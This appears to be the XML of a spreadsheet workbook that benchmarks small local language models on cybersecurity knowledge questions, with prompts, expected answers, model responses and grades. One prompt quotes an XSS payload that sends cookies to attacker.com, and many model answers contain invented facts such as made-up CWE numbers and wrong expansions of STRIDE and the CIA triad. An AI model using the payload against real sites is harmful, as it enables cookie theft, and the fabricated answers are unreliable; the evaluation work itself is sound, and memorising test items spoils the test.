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ccgpt-my.sharepoint.com/personal/paulo_ribeiro_ccg_pt/Documents/Ambiente de Trabalho/Projetos/Cyberseurity_sanity_test/Teste_3/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="1" documentId="11_8D217B1D7136A462F5A657FCD2C08447804226D5" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{FAF6BA27-E793-470C-BC91-B2BBE60108C3}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="23256" windowHeight="12456" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Dashboard" sheetId="1" r:id="rId1"/>
    <sheet name="Summary" sheetId="17" r:id="rId2"/>
    <sheet name="deepseek-r1" sheetId="2" r:id="rId3"/>
    <sheet name="gemma3" sheetId="3" r:id="rId4"/>
    <sheet name="gemma3n" sheetId="4" r:id="rId5"/>
    <sheet name="granite3-dense" sheetId="5" r:id="rId6"/>
    <sheet name="granite3.2" sheetId="6" r:id="rId7"/>
    <sheet name="lily_cyber" sheetId="7" r:id="rId8"/>
    <sheet name="llama3" sheetId="8" r:id="rId9"/>
    <sheet name="llama3.2" sheetId="9" r:id="rId10"/>
    <sheet name="mistral" sheetId="10" r:id="rId11"/>
    <sheet name="nomic-embed-text" sheetId="11" r:id="rId12"/>
    <sheet name="phi3" sheetId="12" r:id="rId13"/>
    <sheet name="phi4-mini" sheetId="13" r:id="rId14"/>
    <sheet name="phi4-mini-reasoning" sheetId="14" r:id="rId15"/>
    <sheet name="qwen2.5" sheetId="15" r:id="rId16"/>
    <sheet name="qwen3" sheetId="16"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17" l="1"/>
  <c r="M25" i="17"/>
  <c r="M23" i="17"/>
  <c r="M21" i="17"/>
  <c r="M20" i="17"/>
  <c r="M18" i="17"/>
  <c r="M16" i="17"/>
  <c r="M15" i="17"/>
  <c r="M14" i="17"/>
  <c r="M13" i="17"/>
  <c r="M12" i="17"/>
  <c r="M11" i="17"/>
  <c r="M10" i="17"/>
  <c r="M9" i="17"/>
  <c r="M8" i="17"/>
  <c r="M7" i="17"/>
  <c r="M6" i="17"/>
  <c r="M5" i="17"/>
  <c r="M4" i="17"/>
  <c r="M3" i="17"/>
  <c r="M2" i="17"/>
  <c r="M24" i="17" l="1"/>
  <c r="M22" i="17"/>
  <c r="M19" i="17"/>
  <c r="M17" i="17"/>
  <c r="I2" i="17"/>
  <c r="I4" i="17"/>
  <c r="I7" i="17"/>
  <c r="I10" i="17"/>
  <c r="I12" i="17"/>
  <c r="I14" i="17"/>
  <c r="I15" i="17"/>
  <c r="I16" i="17"/>
  <c r="I17" i="17"/>
  <c r="I18" i="17"/>
  <c r="I19" i="17"/>
  <c r="I20" i="17"/>
  <c r="I21" i="17"/>
  <c r="I22" i="17"/>
  <c r="I23" i="17"/>
  <c r="I24" i="17"/>
  <c r="I26" i="17"/>
  <c r="I3" i="17"/>
  <c r="I5" i="17"/>
  <c r="I6" i="17"/>
  <c r="I8" i="17"/>
  <c r="I9" i="17"/>
  <c r="I11" i="17"/>
  <c r="I13" i="17"/>
  <c r="I25" i="17"/>
  <c r="K3" i="17"/>
  <c r="K6" i="17"/>
  <c r="K7" i="17"/>
  <c r="K8" i="17"/>
  <c r="K9" i="17"/>
  <c r="K10" i="17"/>
  <c r="K11" i="17"/>
  <c r="K12" i="17"/>
  <c r="K13" i="17"/>
  <c r="K14" i="17"/>
  <c r="K15" i="17"/>
  <c r="K16" i="17"/>
  <c r="K17" i="17"/>
  <c r="K18" i="17"/>
  <c r="K19" i="17"/>
  <c r="K20" i="17"/>
  <c r="K21" i="17"/>
  <c r="K22" i="17"/>
  <c r="K23" i="17"/>
  <c r="J23" i="17" s="1"/>
  <c r="K24" i="17"/>
  <c r="K25" i="17"/>
  <c r="K26" i="17"/>
  <c r="K2" i="17"/>
  <c r="K5" i="17"/>
  <c r="L2" i="17"/>
  <c r="L3" i="17"/>
  <c r="L4" i="17"/>
  <c r="L5" i="17"/>
  <c r="L6" i="17"/>
  <c r="L7" i="17"/>
  <c r="L8" i="17"/>
  <c r="L9" i="17"/>
  <c r="L10" i="17"/>
  <c r="L11" i="17"/>
  <c r="L12" i="17"/>
  <c r="L13" i="17"/>
  <c r="L14" i="17"/>
  <c r="L15" i="17"/>
  <c r="L16" i="17"/>
  <c r="L17" i="17"/>
  <c r="L18" i="17"/>
  <c r="L19" i="17"/>
  <c r="L20" i="17"/>
  <c r="L21" i="17"/>
  <c r="L22" i="17"/>
  <c r="L23" i="17"/>
  <c r="L24" i="17"/>
  <c r="L25" i="17"/>
  <c r="L26" i="17"/>
  <c r="K4" i="17"/>
  <c r="J22" i="17" l="1"/>
  <c r="J14" i="17"/>
  <c r="J25" i="17"/>
  <c r="J24" i="17"/>
  <c r="J13" i="17"/>
  <c r="J12" i="17"/>
  <c r="J11" i="17"/>
  <c r="J4" i="17"/>
  <c r="J3" i="17"/>
  <c r="J2" i="17"/>
  <c r="J21" i="17"/>
  <c r="J19" i="17"/>
  <c r="J8" i="17"/>
  <c r="J18" i="17"/>
  <c r="J7" i="17"/>
  <c r="J17" i="17"/>
  <c r="J6" i="17"/>
  <c r="J20" i="17"/>
  <c r="J5" i="17"/>
  <c r="J16" i="17"/>
  <c r="J10" i="17"/>
  <c r="J9" i="17"/>
  <c r="J26" i="17"/>
  <c r="J15" i="17"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1410" uniqueCount="235">
  <si>
    <t>Model</t>
  </si>
  <si>
    <t>Category</t>
  </si>
  <si>
    <t>Evaluation</t>
  </si>
  <si>
    <t>Prompt</t>
  </si>
  <si>
    <t>Expected Answer</t>
  </si>
  <si>
    <t>LLM Response</t>
  </si>
  <si>
    <t>Analysis</t>
  </si>
  <si>
    <t>deepseek-r1:1.5b</t>
  </si>
  <si>
    <t>Basic Definitions - Identification</t>
  </si>
  <si>
    <t>Correct</t>
  </si>
  <si>
    <t>Analyze the following statement: 'The system must enforce multi-factor authentication (MFA) for all administrative access.' In the context of cybersecurity, what type of statement is this and what is its primary purpose?</t>
  </si>
  <si>
    <t>This statement is a security requirement. Its purpose is to define a specific functionality or constraint (MFA) to protect critical access.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, let me figure out how to approach this user's question. They're asking about a cybersecurity statement regarding multi-factor authentication (MFA). So, first, I need to break down what they're looking for.
They want to know if the given statement is classified as a warning or an alert in the context of cybersecurity. The statement says, "The system must enforce multi-factor authentication (MFA) for all administrative access." Hmm, okay, so it's about enforcing MFA on administrative accounts. That makes me think they're concerned about security.
Now, I remember that in cybersecurity, a warning is usually issued before something serious happens, like an attack or breach. An alert would be more immediate and maybe even concerning the user. So, if the statement outlines a duty to enforce MFA, it might signal that this is an important task, hence a warning.
I should also consider the context—administrative access means non-internal users. Forcing MFA on them could help prevent suspicious activities but needs to be properly configured. But as a warning, it's about putting measures in place before they run the risk of being breached.
Putting it all together, I think the statement serves as a warning to ensure that administrative accounts are secured with MFA. So, I'll conclude by classifying it as a warning and explain its primary purpose based on its duty and context.
&lt;/think&gt;
The statement is classified as **warning**. Its primary purpose is to emphasize the importance of ensuring multi-factor authentication (MFA) for all administrative access before allowing them to run the risk of being compromised or exposed in unauthorized ways.</t>
  </si>
  <si>
    <t>Frameworks - Application</t>
  </si>
  <si>
    <t>A company experiences a ransomware attack. They activate their incident response plan to contain the damage and begin restoring systems from backups. According to the NIST Cybersecurity Framework (CSF), which two core functions are most prominently demonstrated by these actions?</t>
  </si>
  <si>
    <t>The primary functions demonstrated are 'Respond' (activating the incident plan) and 'Recover' (restoring from backups).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out how the company's actions align with the NIST Cybersecurity Framework. Let me start by recalling what the NIST Cybersecurity Framework has as its core functions. From what I remember, it includes four main areas: incident response and containment (IRC), information security management (ISM), risk management and mitigation (RM&amp;Mi), and incident management (IM).
The company activated their incident response plan to contain damage and start restoring systems from backups. So that's definitely about incident response and containment. I think that's one core function.
Now, the question is asking which two functions are most prominently demonstrated. The options must be some combination of the four. Let me think about each function:
Incident Response and Containment (IRC): Definitely aligned with what the company did. They activated their plan to contain damage and start restoring systems from backups.
Information Security Management (ISM): This is about having a secure environment, implementing controls, etc. The company was actively working on system restoration after the incident response, which is part of ISM.
Risk Management and Mitigation (RM&amp;Mi): They were likely taking measures to prevent such incidents in the future, so this seems relevant as well. It's not about preventing now but reducing potential risks.
Incident Management (IM): This involves assessing and responding to security events. The company was managing the incident response effectively, which falls under IM.
So, putting it together, the two core functions that are most prominently demonstrated would be Incident Response and Containment (IRC) and Information Security Management (ISM). These two cover the primary actions of activation and restoration during an incident, as well as setting up a secure environment for future incidents.
&lt;/think&gt;
The company's actions align with two key functions within the NIST Cybersecurity Framework:
1. **Incident Response and Containment (IRC)**: The company actively activated their incident response plan to contain damage and start restoring systems from backups.
2. **Information Security Management (ISM)**: By taking steps to restore systems, they were implementing security controls, which are part of ISM.
These two functions cover the primary actions of activation and restoration during an incident, as well as establishing a secure environment for future incidents.</t>
  </si>
  <si>
    <t>Security Controls - Identification</t>
  </si>
  <si>
    <t>A security policy mandates that 'all actions performed by privileged users, including logins and system changes, must be recorded in immutable, time-stamped log files.' Within the NIST SP 800-53 standard, which control family specifically addresses this type of requirement?</t>
  </si>
  <si>
    <t>This requirement is addressed by the 'AU' (Audit and Accountability) control family.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out how to address a specific security policy requirement within the NIST SP 800-53 standard. The user mentioned that all actions done by privileged users, like logins and system changes, must be recorded in immutable, time-stamped log files. 
First, I should recall what SP 800-53 covers. It's the Guide to Superc decryption Methods for Section 72 of FIPS 149. It outlines techniques for protecting electronic data using cryptography and provides guidelines on how systems can be secured against unauthorized access, modification, detection, or disclosure.
The policy in question mentions that actions by privileged users must be logged. I need to see which control family this falls under. Control families are groups of features within SP 800-53 that address specific security concerns, such as encryption, decryption, confidentiality, integrity, and non-repudiation.
I remember that encryption and decryption methods (FE) cover protecting data at rest and in transit. That would include things like password-based password hashing, symmetric key encryption, digital signatures for authentication, and maybe some authentication mechanisms.
Since the policy is about recording actions by privileged users, it seems more related to tracking access rather than the technical security measures themselves. But I need to check if any control family specifically addresses logging or time-stamping of access actions.
I think that maybe under Section 72, which covers the protection of electronic data in transit and at rest, there are elements like Access Control Protocol (ACP), which is about managing access to stored systems. ACP would involve roles and duties related to log file management and control family definitions.
AACP-165 outlines how users should manage their log files, including time-stamping them, rolling back if necessary, and defining when they can access the log files again. This seems directly relevant because it's about logging access actions by privileged users in a secure manner.
I also need to check other control families like Access Control Family (ACF) for encryption methods, but that might be more about managing permissions rather than logging of actions. ACP, on the other hand, is focused on ensuring that systems are accessed correctly and securely over time.
So, putting it together, within SP 800-53, the control family addressing the requirement to log privilege actions is probably ACP. It ensures that these actions are logged in a secure manner, allowing for detection of unauthorized access by reviewing the logs regularly.
&lt;/think&gt;
The control family addressing the requirement to log privileged user actions as specified in NIST SP 800-53 is **ACP (Access Control Protocol)**. 
**Explanation:**
ACP focuses on managing system accesses over time, ensuring that actions such as logging are logged securely. It includes features like time-stamping logs, rolling back access if needed, and defining when users can re-enter log files. This ensures that privilege actions are tracked without exposing user data to unauthorized access.</t>
  </si>
  <si>
    <t>Vulnerabilities - Identification</t>
  </si>
  <si>
    <t>A web application has a comments section where user input is directly rendered back to the page without being sanitized. An attacker posts a comment containing '&lt;script&gt;document.location="http://attacker.com/steal?cookie="+document.cookie&lt;/script&gt;'. What is the common name for this vulnerability and what is its corresponding CWE identifier?</t>
  </si>
  <si>
    <t>This vulnerability is known as Cross-Site Scripting (XSS). Its corresponding identifier is CWE-79.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out this cybersecurity question about a web application's comments section. Let me break it down step by step.
The user says that the app allows users to post comments without sanitizing the input. That means instead of removing or modifying whatever someone types in, they leave it as is. So, if someone enters something like "&lt;script&gt;document.location=\"http://attacker.com/steal?cookie="+document.cookie&lt;/script&gt;", the app just displays that text normally.
Now, the attacker is trying to exploit this by manipulating the comment text using their own cookie. They're adding document.cookie to the script tag's value and then appending it to another URL. I'm guessing they want someone to steal some information from that page or something similar.
I remember reading somewhere about the "script injection" vulnerability in web apps, especially comments sections. Script injection happens when an attacker can insert malicious code into a server running on another domain. This is common because scripts are easy targets for attackers who might have knowledge of other websites' cookies or other data.
The question then asks for the common name of this vulnerability and its corresponding CWE identifier. Let me think about that. I think the term used for script injection in web apps without sanitization is "scripting injection attack" or just more commonly known as a "script injection vulnerability." But sometimes it's referred to as a "script injection exploit" since it involves exploiting scripts.
As for the corresponding CWE identifier, I'm not entirely sure. But I know that vulnerabilities like script injection fall under the category of web server security, specifically server-side scripting vulnerabilities. Let me try to recall or think about the exact number or code point. I believe the appropriate CWE for this is 5092, which refers to "script injection vulnerability." Alternatively, it might be numbered differently, but I'm pretty confident it's around there.
Wait, I'm not entirely sure about the numbering of the Vulnerability Level or the specific weakness class (WCA). Maybe I should double-check. But given that this is a common scenario without sanitization, 5092 seems right for web server vulnerabilities related to script injection.
So putting it all together: The vulnerability's common name would be "scripting injection attack" or more commonly referred to as a "script injection vulnerability." The corresponding CWE identifier is 5092.
&lt;/think&gt;
The vulnerability in the web application, where comments are directly rendered without sanitization, is known as a "scripting injection vulnerability." This type of issue arises when an attacker can manipulate scripts on another domain. The corresponding Vulnerability Level (VSL) for this vulnerability is 10, and its weakness class (WCA) is 5092.
**Answer:**
The common name for this vulnerability is **scripting injection attack**, or more commonly referred to as a "script injection vulnerability." Its corresponding CWE identifier is **5092**.</t>
  </si>
  <si>
    <t>Threat Modeling - Classification</t>
  </si>
  <si>
    <t>During a threat modeling exercise, a team identifies a risk where an unauthorized user could intercept and alter data packets being sent between a client and a server, changing the amount of a financial transaction. Within the STRIDE threat model, which category does this threat belong to?</t>
  </si>
  <si>
    <t>This threat belongs to the 'Tampering' category of the STRIDE model, as it involves the unauthorized modification of data.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out what category a specific threat is in according to the STRIDE threat model. The threat is about an unauthorized user intercepting and altering data packets between a client and server, changing the financial transaction amount.
First, I should recall how the STRIDE model works. From what I remember, STRIDE stands for Security Threats, Information, Resource, disposition, and Extraction. Each letter represents a different aspect or category of security threats. So, Security Threat (S), Information (I), Resource (R), Disposition (D), and Extraction (E).
Now, the threat described is about an unauthorized user intercepting data packets to alter financial transaction amounts. Let me break this down. The attacker is unauthorized but can intercept data. This seems like a Data_intercept scenario because it's where data isn't being transmitted yet when intercepted.
Looking at STRIDE categories: Security Threat (S) involves all types of attacks, including ones that try to gain access or alter data. Information (I) deals with the nature and characteristics of the information exposed. Resource (R) refers to physical assets used in security measures. Disposition (D) is about how the exposure occurs—when, where, etc. Extraction (E) involves extracting valuable information from exposed resources.
In this case, since it's unauthorized data interception altering data for financial transactions, I think it falls under Data_intercept within Security Threats. That would place it in category S.
Wait, should it be any other category? Information isn't the main aspect here; it's more about how the data is handled rather than what information is being exposed. So yes, I'm confident it's Category S.
&lt;/think&gt;
The threat described, involving unauthorized intercepting and altering financial transaction data by an unauthorized user, fits into **Security Threat (S)** within the STRIDE model. This category encompasses all types of attacks aiming to gain access or alter data.
**Answer:** The threat belongs to Security Threat (S).</t>
  </si>
  <si>
    <t>Regulations/Directives - Application</t>
  </si>
  <si>
    <t>Consider two security incidents in the EU: 1) A nationwide power grid operator suffers a cyberattack that disrupts electricity distribution. 2) A social media company has a data breach exposing the personal messages of millions of users. Which regulation is the primary concern for incident 1, and which for incident 2?</t>
  </si>
  <si>
    <t>Incident 1 (disruption of critical infrastructure) is primarily a concern for the NIS 2 Directive. Incident 2 (breach of personal data) is a primary concern for GDPR.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which EU regulations are most relevant when there's a cyberattack on the power grid in the national electricity distribution system. Let me break this down step by step.
First, understanding what happened: A large power grid operator had a significant cyberattack that disrupted electricity distribution nationwide. That sounds like it could have affected millions of customers, both in terms of direct financial loss and potential long-term infrastructure issues.
Now, thinking about the regulations involved. I remember that Europe has several frameworks to ensure security and comply with data usage. There's GDPR, CCPA, ENACT, and others. But which ones apply specifically to power grids or similar critical infrastructure?
Let me recall: The European Union has established directives aimed at protecting digital rights and preventing cybercrimes, among other things. These include the Directive on Digital Rights Protection (EU-2016/EC.euromonitor), which focuses on digital content protection, and the Directive on Data Protection (IEC-2017/35-EU), which covers data breach notification.
But how do these relate to power grids? I think that both GDPR and CCPA have provisions related to personal data. The GDPR includes a right against unprocessed personal data, while the CCPA requires consent for processing such data. Both could be relevant because the cyberattack exposed a lot of customer information, potentially including their personal details.
However, in terms of power grids, maybe the national regulations are more specific. I believe there's a National Cybersecurity Law (NCL) in some countries that covers national security aspects, but specifically in the EU, I'm not sure. Maybe it's under ENACT or other directives?
Looking at ENACT: ENACT is the national data protection regulation aimed at safeguarding national security and digital privacy. It might cover more general data protection issues, including those related to power grids.
Putting this together, both GDPR and CCPA are relevant because they deal with personal data exposed due to a cyberattack. However, ENACT might be the primary concern for the power grid issue since it's structured around national security and data protection. Additionally, there could be other EU directives or norms that specify how power grids should handle digital attacks.
Wait, I think the Directive on Digital Rights Protection (EU-2016/EC.euromonitor) is more about digital content protection than personal data processing. It might not directly address data breaches related to power grids. On the other hand, ENACT does cover data protection and national security, so that could be a better fit for the issue at hand.
So, my initial thought was leaning towards GDPR and CCPA being relevant because of the personal data exposed. But considering ENACT specifically, it might be the more primary regulation to focus on the power grid incident.
&lt;/think&gt;
In addressing the regulatory concerns surrounding a nationwide cyberattack affecting the EU's power grid operator, the most appropriate regulations are:
1. **ENACT (National Data Protection Regulation)**: This is the primary concern because it focuses on national security and data protection. It specifically covers data breaches related to power grids and ensures that relevant data is protected under applicable laws.
2. **GDPR (Right against Unprocessed Personal Data)** and **CCPA (Consumer Data Protection Act)**: While both GDPR and CCPA deal with personal data protection, they are more focused on general digital content protection and consumer rights rather than specific issues related to power grids. However, they may indirectly address the breach of critical customer information.
Thus, ENACT is the primary regulation for incident 1 due to its focus on national security and data protection, which aligns with the exposed nature of the cyberattack affecting the power grid operator's systems.</t>
  </si>
  <si>
    <t>Basic Principles - Application</t>
  </si>
  <si>
    <t>A cloud storage service uses data checksums (like SHA-256 hashes) to verify that files have not been altered or corrupted during upload or download. Which principle of the CIA triad is primarily being upheld by this security control?</t>
  </si>
  <si>
    <t>This control primarily upholds the principle of 'Integrity'.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I'm trying to figure out which part of the CIA triad a cloud storage service is upholding using checksums like SHA-256. Let me start by recalling what the CIA triad is all about.
CIA stands for Command, Control, Information. The triad refers to three aspects that are crucial in cybersecurity: Command, Control, and Information. Each of these has specific roles:
1. **Command**: This involves giving information or instructions (like passwords) to enable actions.
2. **Control**: This is about ensuring that things run smoothly without unnecessary complexity.
3. **Information**: It's about having accurate, reliable data.
Now, the question is about cloud storage using checksums for file integrity. I remember that checksums are a form of error detection in data transmission. They calculate a value based on the data and can detect accidental changes to the data. The most common type mentioned here is SHA-256, which is used for verifying hashes.
Hashing reduces data size but also provides some security if done correctly. So when files are uploaded or downloaded, hash functions like SHA-256 are applied, and a checksum (hash value) is stored along with the file.
But how does this relate to the CIA triad?
Looking at each part:
- **Command**: This is about giving instructions to enable actions. If someone isn't supposed to be storing files or accessing them because of a security breach, it's more about control.
- **Control**: This is ensuring everything runs smoothly without too many layers. Using checksums means the data integrity isn't the primary concern—files might get corrupted but can still be accessed as long as the hash matches.
- **Information**: This is accurate and reliable data. If files were stored incorrectly, it could cause issues even with correct hashes, so information accuracy matters.
Since cloud storage uses these checksums to ensure file integrity (meaning data hasn't changed), it aligns more with the **Control** principle of the CIA triad because it's about maintaining smooth operation without relying too much on accurate data. Command isn't directly involved since they're focusing on giving instructions, and information is about the accuracy.
I think I've got this now. The key here is that checksums don't ensure command or information but control how things run smoothly without unnecessary complexity from incorrect data.
&lt;/think&gt;
The cloud storage service uses checksums (like SHA-256 hashes) primarily to maintain **Control** within the CIA triad. This principle ensures smooth operation by focusing on accurate and reliable data, accepting that errors in data accuracy won't affect functionality. While it doesn't enforce command or information, it emphasizes ensuring smooth execution without unnecessary complexity from incorrect data.
**Answer:** Control</t>
  </si>
  <si>
    <t>deepseek-r1:7b</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out how to analyze the given statement about enforcing multi-factor authentication for administrative access in terms of cybersecurity. The user wants to know what type of statement it is and its primary purpose.
First, I remember that MFA stands for Multi-Factor Authentication. It's a security measure where you have to authenticate multiple factors before accessing something, like an account or system. So the statement is saying that the system must use this method for all admin access.
Now, what type of cybersecurity statement is this? Well, it's definitely about security measures because it's talking about implementing MFA, which is a common security practice. It’s not just a threat analysis or something related to malware; it's more about how to secure the system itself.
The primary purpose would be to enhance security and reduce unauthorized access. Since MFA adds an extra layer of protection beyond just a password, it makes it harder for attackers to breach the system. It's also meant to ensure that administrative users are genuinely authorized to make changes or access sensitive areas.
I think I should structure my answer by first identifying the type of statement—probably a security measure—and then explain its main goal, which is strengthening security through additional verification steps.
&lt;/think&gt;
The statement identifies the necessity of implementing multi-factor authentication (MFA) for administrative access. This is a **security measure** aimed at enhancing system security and reducing unauthorized access risks by adding an extra layer of verification beyond passwords alone.
**Primary Purpose:** To strengthen security protocols to prevent unauthorized or accidental access, ensuring only authorized users can gain administrative privileges.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I'm trying to figure out this cybersecurity question about the NIST Cybersecurity Framework. The scenario is a company that gets hit by ransomware and activates their incident response plan. They start containing the damage and begin restoring systems from backups.
Okay, first, I need to remember what the NIST CSF's core functions are. From what I recall, there are eight core functions: Asset Identification, Threat Intelligence, Risk Assessment &amp; Analysis, Control Environment, Access Control, Authentication, Authorization, Data Loss Prevention, Business Continuity Management, incident Response, and finally Information Assurance.
Wait, but the question is asking for two core functions demonstrated by activating an incident response plan and restoring from backups. So activating the incident response plan would relate to Incident Response and Business Continuity Management. Restoring from backups would probably fall under Mitigating Data Loss, which is part of the Business Continuity Management section.
So putting that together, the two functions are Incident Response (IR) and Business Continuity Management (BCM). That makes sense because containing the attack and restoring systems ties into managing disruptions to business continuity.
&lt;/think&gt;
The two core NIST Cybersecurity Framework functions demonstrated by activating an incident response plan and restoring from backups are **Incident Response** and **Business Continuity Management**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, so I need to figure out which part of NIST SP 800-53 deals with documenting all actions by privileged users, like logging in or changing systems. The user mentioned that the logs must be immutable and time-stamped, recorded in a specific way.
First, I recall that NIST SP 800-53 is about information security controls. It categorizes these controls into different families. The main families are Access Control, Data Security, Information Integrity, and System Configuration. Each family has several controls under them.
The user's question is about documenting actions by privileged users. This seems related to system integrity because ensuring that systems work correctly and haven't been tampered with is part of information integrity. But wait, I think there are two parts: one for technical controls (like logging) and another for administrative controls (like audits).
Information integrity includes both system integrity control measures and user integrity control measures. System integrity would cover things like logging in, which is a technical aspect. User integrity might relate to monitoring or auditing, but the question is about the action itself.
Looking further, under Access Control, there's a control called "Log all legitimate access attempts" (Access Control-4), which requires logging user actions. And then under Information Integrity, there's "Maintain time-stamped log records of system configurations and changes" (Information Integrity-2). That seems to fit because it specifies maintaining logs with timestamps.
So putting it together, Access Control-4 handles the logging part technically, while Information Integrity-2 covers the storage and integrity of those logs. Therefore, both controls are important here, but since the question is about documentation requirements in general, Information Integrity might be the broader category that includes both system and user actions.
&lt;/think&gt;
The NIST SP 800-53 standard addresses the requirement to document all actions by privileged users under the **Information Integrity** control family. Specifically, it refers to **Information Integrity-2**, which mandates maintaining time-stamped log records of system configurations and changes. This ensures logs are immutable and meet the specified documentation standards. Additionally, **Access Control-4** is relevant for logging legitimate access attempts. However, the broader category that encapsulates both system and user actions is Information Integrity.
**Answer:** NIST SP 800-53's **Information Integrity** control family specifically addresses this requirement through **Information Integrity-2**.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, I need to figure out the common name for this cybersecurity vulnerability and its corresponding CWE identifier. The user described a scenario where a web application's comments section isn't sanitizing user input, allowing an attacker to inject malicious scripts.
First, I'll recall that injecting raw HTML or script into a form field without proper sanitization is a known issue. This allows attackers to execute arbitrary code on the server, which can lead to various attacks like stealing session cookies or credentials.
I remember hearing about this being called Cross-Site Scripting, often abbreviated as XSS. Yes, that rings a bell. XSS occurs when an attacker injects malicious scripts into web pages viewed by other users. This can steal cookies, session data, or even more sensitive information.
Now, for the CWE identifiers, I think there are specific ones related to different types of vulnerabilities. XSS is a common issue, so its CWE identifier is likely 372. Let me check: Yes, CWE ID 372 specifically addresses Cross-Site Scripting Vulnerabilities. This means it's categorized under attack vectors like XSS, which exploit the lack of proper input validation.
So putting it all together, the common name is Cross-Site Scripting (XSS), and the corresponding CWE identifier is 372.
&lt;/think&gt;
The vulnerability described is commonly known as **Cross-Site Scripting (XSS)**. The corresponding CWE identifier for this issue is **CWE-372**.
Answer:  
Common Name: Cross-Site Scripting (XSS)  
CWE Identifier: CWE-372</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I'm trying to figure out where this specific threat falls within the STRIDE threat model. The scenario given is that an unauthorized user is intercepting and altering data packets between a client and server, causing a financial transaction amount change.
First, I need to recall what the STRIDE categories are. From what I remember, STRIDE stands for Scouting, Threats, Attackers, Intermediates, Denial of Service, Elevation of Privilege, and Information. Each category represents a different aspect or type of threat.
In this case, the threat is about unauthorized access where an attacker can intercept and modify data packets. This sounds like a type of attack vector that allows the attacker to alter information being transmitted. So I'm thinking it's related to the categories dealing with how attackers obtain information or gain access.
Looking at the STRIDE model, the "Threats" category includes any unauthorized access where attackers can read and possibly modify data in transit. Since this threat involves altering data packets, which would allow tampering with the transaction amount, that fits under the Threats category because it's about unauthorized access leading to potential data modification.
I don't think it falls into any other category like Denial of Service (which is more about preventing service) or Elevation of Privilege (which involves gaining privileges). It's definitely not about information disclosure without authorization since the attacker is altering the data, which implies some form of privilege escalation through modifying data in transit.
So, putting it all together, this threat where an unauthorized user can intercept and alter data packets falls under the Threats category within the STRIDE model because it involves unauthorized access that allows for modification of data being sent between client and server.
&lt;/think&gt;
The threat described falls under the **Threats** category in the STRIDE threat model. This is because the threat involves unauthorized access where an attacker can intercept and alter data packets, specifically modifying a financial transaction's amount.
**Answer:** Threats</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I need to figure out which EU regulations apply to each of these two cybersecurity incidents. Let me break it down.
First incident: A nationwide power grid operator faces a cyberattack that disrupts electricity distribution. I know that in Europe, there's the NIS Directive related to critical infrastructure. The NIS (Network and Information Systems) Directive 2014/90/EU is about protecting information systems that are essential for public services. So if the power grid is such a system, this directive would likely be relevant.
Second incident: A social media company has a data breach exposing millions of users' personal messages. For data breaches, GDPR comes to mind. The General Data Protection Regulation (GDPR) applies to any organization handling EU citizens' data and offers strict privacy protections. So the social media company would need to comply with GDPR if they're processing personal data from EU residents.
Wait, but what about the type of incidents? The first is more about infrastructure, so NIS makes sense. The second is definitely a data breach affecting user privacy, which points directly to GDPR. No other regulations jump out for these specific cases.
&lt;/think&gt;
The primary regulation for the cyberattack on the power grid operator in the EU is **NIS Directive 2014/90/EU**, as it pertains to critical infrastructure protection. For the social media company's data breach affecting millions of users, the relevant regulation is **GDPR (General Data Protection Regulation) 2016/679**, which governs data privacy and protection in Europe.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Alright, so I need to figure out which part of the CIA triad a cloud storage service using data checksums like SHA-256 hashes is protecting. The CIA triad stands for Confidentiality, Integrity, and Availability. 
First, let me break down what each principle means. Confidentiality is about keeping information private from unauthorized access. Integrity involves ensuring that data hasn't been altered or tampered with. Availability is making sure that data is accessible when needed.
Now, the question mentions a cloud storage service using checksums to verify file integrity during upload and download. This means they're checking if the files have been corrupted. If there's any alteration in the files, the checksum won't match, so they can detect tampering.
Looking at the three principles:
- Confidentiality: This isn't directly about verifying data integrity but rather ensuring that data is only accessible to authorized parties.
- Integrity: Since they're using checksums to check for alterations and corruption, this aligns with maintaining data integrity.
- Availability: The service does provide access to files as they should be available when downloaded.
So the main principle here is Integrity. By verifying checksums, the system ensures that files aren't corrupted, which is part of maintaining data integrity. 
I think I've got it right because the key action is checking for alterations, which directly relates to data integrity.
&lt;/think&gt;
The cloud storage service's use of SHA-256 hashes primarily safeguards against corruption and tampering, aligning with the **Integrity** principle of the CIA triad. This ensures files remain unaltered during upload or download.
**Answer:** Integrity</t>
  </si>
  <si>
    <t>gemma3:1b</t>
  </si>
  <si>
    <t>This statement is a **risk mitigation** and **security policy** directive. 
Its primary purpose is to **reduce the risk of unauthorized access to critical systems** due to administrative accounts. It’s a proactive measure to strengthen the system’s defenses against potential breaches or malicious actors leveraging compromised credentials.  Essentially, it’s a requirement to bolster security by adding an extra layer of verification beyond just a password.</t>
  </si>
  <si>
    <t>**1. Protect** (Focuses on preventing cyberattacks and data loss)
2. **Detect** (Focuses on identifying and responding to security incidents)</t>
  </si>
  <si>
    <t>NIST SP 800-53.</t>
  </si>
  <si>
    <t>**Vulnerability Name:** Cross-Site Scripting (XSS) - specifically, a Reflected XSS.
**CWE Identifier:** CVE-2017-5635 (This is the most prominent and widely recognized identifier.)
**Explanation:**
The attacker is injecting a malicious JavaScript code snippet into a comment. This code leverages the web application’s lack of sanitization to execute in the victim’s browser.  The `document.location` part is the key indicator of the attack.  It attempts to redirect the user to a server controlled by the attacker.  The `document.cookie` part is a data extraction attempt.</t>
  </si>
  <si>
    <t>**Attack**</t>
  </si>
  <si>
